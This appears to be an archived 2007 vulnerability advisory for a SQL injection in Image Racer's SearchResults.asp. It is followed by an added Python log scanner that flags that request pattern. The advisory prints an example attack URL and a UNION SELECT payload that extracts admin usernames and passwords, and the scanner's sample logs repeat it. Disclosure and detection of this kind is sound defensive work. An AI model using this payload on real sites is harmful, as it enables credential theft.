Additional information

Daily summary of bugs in Web applications (PHP, ASP, JSP, CGI, Perl)
Minb Is Not A Blog default password directory
Webspell 4.x Local File Inclusion
PHMe CMS 0.0.2 local File Include Vulnerability
SEC Consult SA-20070722-0 :: Remote command execution in Joomla! CMS

From: Advisory_(at)_Aria-Security.net <Advisory_(at)_Aria-Security.net>
Date: July 23, 2007
Subject: [Aria-Security] Image Racer SearchResults.asp SQL INJECTION vuln.

__________________
Aria-Security Team
__________________

Image Racer SearchResults.asp SQL Injection

Vendor: http://www.junctionquest.com/Software.asp

Example: http://www.TARGET.com/SearchResults.asp?SearchWord=[SQL COMMAND]&WordSearchCrit=Yes&image.x=0&image.y=0

Example: -1 'union select username,password from admin where [FIND IT YOUR SELF]=1

------------------------------------------------
Credits: Aria-Security Team
http://aria-security.net/
Personal Blog: http://outlaw.aria-security.info
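A defender-side check for the request pattern in this advisory, as an added example that is not part of the original post or the vendor's code: it scans web access log lines for requests to SearchResults.asp whose SearchWord value carries SQL metacharacters. The log lines, the combined-style log format, and the function names are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (assumed combined-style format, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [23/Jul/2007:10:01:02 +0000] "GET /SearchResults.asp?SearchWord=sunset&WordSearchCrit=Yes&image.x=0&image.y=0 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [23/Jul/2007:10:03:17 +0000] "GET /SearchResults.asp?SearchWord=-1%20%27union%20select%20username,password%20from%20admin&WordSearchCrit=Yes HTTP/1.1" 500 312',
    '192.0.2.51 - - [23/Jul/2007:10:04:40 +0000] "GET /searchresults.asp?SearchWord=O%27Brien&WordSearchCrit=Yes HTTP/1.1" 200 4410',
    '192.0.2.10 - - [23/Jul/2007:10:05:09 +0000] "GET /Default.asp?SearchWord=%27 HTTP/1.1" 200 900',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
UNION_RE = re.compile(r"\bunion\b.+\bselect\b", re.I | re.S)

def findings_for(value):
    """Return the reasons a decoded SearchWord value looks like SQL, strongest last."""
    reasons = []
    if "'" in value:                      # string delimiter breaking out of the query
        reasons.append("single-quote")
    if UNION_RE.search(value):            # UNION SELECT as in the advisory's example
        reasons.append("union-select")
    if "--" in value or "/*" in value:    # comment used to cut off the rest of the query
        reasons.append("sql-comment")
    return reasons

def scan(lines):
    """Return (line number, decoded SearchWord, reasons) for each suspicious request."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        # IIS paths and ASP query-string keys are case-insensitive, so compare lowercased.
        if not url.path.lower().endswith("/searchresults.asp"):
            continue
        for key, values in parse_qs(url.query, keep_blank_values=True).items():
            if key.lower() != "searchword":
                continue
            for value in values:          # parse_qs has already percent-decoded the value
                reasons = findings_for(value)
                if reasons:
                    hits.append((lineno, value, reasons))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A lone single-quote hit, such as the surname on sample line 3, is a weak signal to triage, while a union-select hit is a stronger one.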